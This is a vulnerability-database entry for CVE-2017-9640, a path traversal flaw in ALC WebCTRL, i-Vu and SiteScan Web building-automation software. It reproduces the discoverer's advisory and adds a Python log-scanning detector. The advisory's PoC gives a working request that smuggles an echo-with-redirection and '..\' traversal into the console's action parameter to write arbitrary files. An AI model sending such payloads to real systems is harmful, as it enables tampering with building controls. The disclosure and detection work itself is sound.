ALC WebCTRL, i-Vu and SiteScan Web Path Traversal Vulnerability

Vulnerability ID: 1124192    Vulnerability type: Path traversal
Published: 2017-08-22    Updated: 2019-10-17
CVE ID: CVE-2017-9640    CNNVD ID: CNNVD-201706-863
Platform: Java    CVSS score: 6.5
|Sources
https://www.exploit-db.com/exploits/42543
https://cxsecurity.com/issue/WLB-2017080165
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201706-863
|Vulnerability details
ALC WebCTRL, i-Vu and SiteScan Web are products of Automated Logic Corporation (ALC) of the United States. ALC WebCTRL and i-Vu are building automation control systems; SiteScan Web is a web site. A path traversal vulnerability exists in ALC WebCTRL, i-Vu and SiteScan Web. An attacker can exploit this vulnerability to overwrite files and execute arbitrary code. The following products and versions are affected: ALC WebCTRL 6.1, 6.0, 5.5 and 5.2; i-Vu 6.1, 5.5 and 5.2; SiteScan Web 6.1, 5.5 and 5.2.
|Exploit (PoC)
Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write


Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior
                  ALC WebCTRL, i-Vu 6.0 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior

Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.

Desc: The vulnerability is triggered by an authenticated user that can use
the manualcommand console in the management panel of the affected application.
The ManualCommand() function in ManualCommand.js allows users to perform additional
diagnostics and settings overview by using a pre-defined set of commands. This
can be exploited by using the echo command to write and/or overwrite arbitrary
files on the system, including directory traversal throughout the system.

Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
           Apache-Coyote/1.1
           Apache Tomcat/7.0.42
           CJServer/1.1
           Java/1.7.0_25-b17
           Java HotSpot Server VM 23.25-b01
           Ant 1.7.0
           Axis 1.4
           Trove 2.0.2
           Xalan Java 2.4.1
           Xerces-J 2.6.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5430
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php

CVE ID: CVE-2017-9640
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640


30.01.2017

--


PoC:

GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1
Host: TARGET

---

GET http://TARGET/touch.txt HTTP/1.1

peend
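As an added example (not part of the advisory above and not the vendor's code), the following Python script shows one way a defender could flag this pattern in web-server access logs: requests to the `manualcommand` servlet whose decoded `action` parameter contains shell output redirection (`>`) or `..` traversal sequences, the two ingredients of the file-write PoC. The servlet path is taken from the PoC; the access-log lines, the log format and the field names are constructed for this example. It goes slightly beyond the PoC by decoding the parameter repeatedly so that a double-encoded traversal sequence is caught as well.

```python
import re
from urllib.parse import parse_qs, unquote

# Servlet path from the PoC request; compared case-insensitively.
MANUALCOMMAND_PATH = "/_common/servlet/lvl5/manualcommand"

# "../" or "..\" (or the reverse) anywhere in the decoded command.
TRAVERSAL_RE = re.compile(r"(\.\.[\\/])|([\\/]\.\.)")
# Shell output redirection used by the echo-to-file technique.
REDIRECT_RE = re.compile(r">{1,2}")

# Constructed common-log-format line: src, ident, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: a benign console command, a traversal write, an unrelated request.
SAMPLE_LOG = [
    r'10.0.0.7 - operator [22/Aug/2017:10:14:03 +0000] "GET /_common/servlet/lvl5/manualcommand?wbs=251&action=help&id=7330 HTTP/1.1" 200 512',
    r'10.0.0.5 - operator [22/Aug/2017:10:15:32 +0000] "GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1" 200 12',
    r'10.0.0.5 - - [22/Aug/2017:10:15:40 +0000] "GET /touch.txt HTTP/1.1" 200 6',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing, to defeat double encoding."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_request(target):
    """Return None for non-manualcommand requests, otherwise the decoded
    action and the list of suspicious properties found in it."""
    path, _, query = target.partition("?")
    if path.lower() != MANUALCOMMAND_PATH:
        return None
    params = parse_qs(query)  # decodes one level of percent-encoding
    action = fully_decode(params.get("action", [""])[0])
    findings = []
    if TRAVERSAL_RE.search(action):
        findings.append("path-traversal")
    if REDIRECT_RE.search(action):
        findings.append("output-redirection")
    return {"action": action, "findings": findings}


def scan_log(lines):
    """Parse access-log lines and return one alert per suspicious console command."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        result = analyse_request(m.group("target"))
        if result and result["findings"]:
            alerts.append({
                "src": m.group("src"),
                "user": m.group("user"),
                "status": m.group("status"),
                **result,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Because the console is reachable only by an authenticated user, the `user` field in each alert is the useful pivot for response: it identifies the account whose session issued the command, which is what an operator would want alongside the source address. A `200` on a file path that never appeared in the log before (the third constructed line) is the corroborating signal that the write succeeded.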
|References

Source: BID
Link: http://www.securityfocus.com/bid/100452
Source: MISC
Link: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01
Source: NSFOCUS
Name: 37462
Link: http://www.nsfocus.net/vulndb/37462